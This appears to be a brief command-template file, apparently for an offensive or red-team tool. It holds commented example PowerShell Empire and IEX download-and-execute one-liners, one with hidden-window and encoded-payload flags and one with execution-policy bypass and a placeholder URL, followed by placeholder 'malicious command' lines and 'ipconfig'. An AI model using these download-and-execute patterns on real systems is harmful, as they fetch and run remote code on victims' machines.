################################################################################################################################################
# Powershell Empire command example
# powershell -noP -sta -w 1 -enc <base64 string>
#
# Powershell IEX example
# powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('<URL>');"
################################################################################################################################################
# <malicious command 1>
# <malicious command 2>
ipconfig
